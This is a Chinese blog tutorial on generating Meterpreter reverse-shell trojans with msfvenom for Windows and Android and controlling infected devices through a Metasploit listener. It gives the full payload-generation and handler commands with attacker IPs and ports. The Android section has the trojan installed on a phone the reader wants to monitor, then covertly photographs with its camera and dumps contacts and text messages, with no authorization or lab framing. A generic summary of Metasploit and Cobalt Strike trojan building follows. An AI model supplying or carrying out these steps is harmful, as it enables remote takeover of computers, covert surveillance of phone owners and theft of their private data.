metasploit、msfvenom生成木马入侵电脑及手机

简介

msfvenom

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件

在这里插入图片描述

查看所有–payload的模块

msfvenom -l payloads
在这里插入图片描述

文件后缀名-f的格式

msfvenom --help-formats
在这里插入图片描述

metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

生成的木马是前端的话,那么这个就是后端

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140
lport=1211 -f exe > /root/shell.exe

启动metasploit

输入命令:

msfconsole

metasploit侦听

msf > use exploit/multi/handler #加载模块 msf exploit(multi/handler) >
set payload windows/meterpreter/reverse_tcp #设置payload payload =>
windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost
kali的ip #设置kali的ip lhost => 192.168.152.131 msf
exploit(multi/handler) > set lport 1211 #设置kali的端口 lport => 1211 msf
exploit(multi/handler) > exploit #执行 [*] Started reverse TCP handler
on 222.222.221.140:1211

将生成的shell上传至windows主机中并运行

提示有返回即可控制对方电脑,如同操作linux服务器一样在这里插入图片描述

使用

? - 帮助菜单

download -下载文件/文件夹

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

msfvenom的apk在android中的使用

msfvenom生成shell.apk

ifconfig查看kali的ip,ip为222.222.221.140
在这里插入图片描述

输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555
R > /root/apk.apk

这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小
在这里插入图片描述

启动metasploit
输入命令:

msfconsole

启动msfconsole
在这里插入图片描述

metasploit配置及监听

在控制台中输入

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

在这里插入图片描述

这里需要设置LHOST的ip地址,也就是你的kali的ip地址

还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)

set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)

set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

exploit //开始执行漏洞 开始监听,等待手机上线

接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了

在这里插入图片描述
使用
然后可以输入sysinfo 查看手机信息
在这里插入图片描述
webcam_list 查看手机有多少个摄像头 这里显示是2个

在这里插入图片描述

webcam_stream //开启摄像头

在这里插入图片描述

webcam_snap //隐秘拍照功能

在这里插入图片描述
在这里插入图片描述

dump_contacts //导出电话号码

在这里插入图片描述
在这里插入图片描述

dump_sms //导出信息

在这里插入图片描述
导出的文件拍的照片都会在root下面
在这里插入图片描述

可以输入?查看更多命令

在这里插入图片描述

session切换 background #后台运行当前
session sessions #列出所有session
sessions -i Id #选择某一个sessionID进入
session sessions -n Name -i Id #给session重命名

参考:https://blog.csdn.net/langtuteng17/article/details/80444115

  • 5
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
1. Metasploit生成木马的过程 Metasploit是一个常用的网络安全工具,它可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序。以下是使用Metasploit生成木马的一般过程: 步骤1:启动Metasploit控制台并选择木马生成模块 Metasploit控制台提供了各种服务和模块,可以生成不同类型的木马程序。要使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole”命令启动控制台,然后使用“search”命令搜索木马生成模块。 步骤2:配置木马生成参数 选择木马生成模块后,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、处理连接的话柄等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成配置参数后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成木马保存到本地目录中。 2. Cobalt Strike生成木马的过程 Cobalt Strike是一款高级的渗透测试工具,可以帮助渗透测试人员生成各种后门程序、木马程序等。以下是使用Cobalt Strike生成木马的一般过程: 步骤1:启动Cobalt Strike客户端并选择木马生成器 启动Cobalt Strike客户端后,可以看到各种功能按钮和命令。要使用Cobalt Strike生成木马,需要选择“payload generator”按钮打开木马生成器。 步骤2:配置木马生成参数 在木马生成器界面,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、加密方式等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成参数配置后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成木马保存到本地目录中。同时,也可以选择将木马发送到受攻击者的计算机上。 总之,Metasploit和Cobalt Strike都是非常强大的网络安全工具,可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序,提高安全测试和研究效率。在使用这些工具时,需要谨慎操作,避免对他人或自己造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值